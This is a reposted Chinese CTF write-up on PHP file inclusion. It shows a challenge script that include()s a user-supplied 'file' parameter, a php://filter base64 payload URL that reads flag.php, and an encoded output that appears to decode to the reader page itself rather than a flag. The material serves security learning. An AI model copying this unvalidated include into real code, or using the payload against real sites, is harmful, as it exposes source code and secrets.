【CTF WEB】文件包含

本文轉載自查看原文 2018-09-29 14:00 795 8_CTF

文件包含

題目要求：

請找到題目中FLAG

漏洞源碼

<meta charset='utf-8'>
<center><h1>文件閱讀器</h1></center>
<!-- 據說flag在flag.php里 -->
<?php
error_reporting(0);
$f=$_GET['file'];
if(stripos($f,"..")===false)
{
	//;
}
else
{
	exit('invalid');
}
if(!$f)
{
	header('Location: ?file=test.txt');
}
else
{
	include($f);
}
?>

測試方法

http://localhost/?file=php://filter/read=convert.base64-encode/resource=flag.php

解開base64就能拿到key了

PG1ldGEgY2hhcnNldD0ndXRmLTgnPg0KPGNlbnRlcj48aDE+5paH5Lu26ZiF6K+75ZmoPC9oMT48L2NlbnRlcj4NCjwhLS0g5o2u6K+0ZmxhZ+WcqGZsYWcucGhw6YeMIC0tPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCiRmPSRfR0VUWydmaWxlJ107DQppZihzdHJpcG9zKCRmLCIuLiIpPT09ZmFsc2UpDQp7DQoJLy87DQp9DQplbHNlDQp7DQoJZXhpdCgnaW52YWxpZCcpOw0KfQ0KaWYoISRmKQ0Kew0KCWhlYWRlcignTG9jYXRpb246ID9maWxlPXRlc3QudHh0Jyk7DQp9DQplbHNlDQp7DQoJaW5jbHVkZSgkZik7DQp9DQo/Pg==

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 南京郵電CTF平台做題writeup--web--文件包含文件包含_CTF Show CTF 文件包含 CTF之文件包含的猥瑣思路 CTF PHP文件包含--session CTF 文件包含與偽協議 CTF-攻防世界-Web_php_include(PHP文件包含) CTF考點總結-文件上傳/文件包含 Bugku-CTF之文件包含2 (150) CTF兩個經典的文件包含案例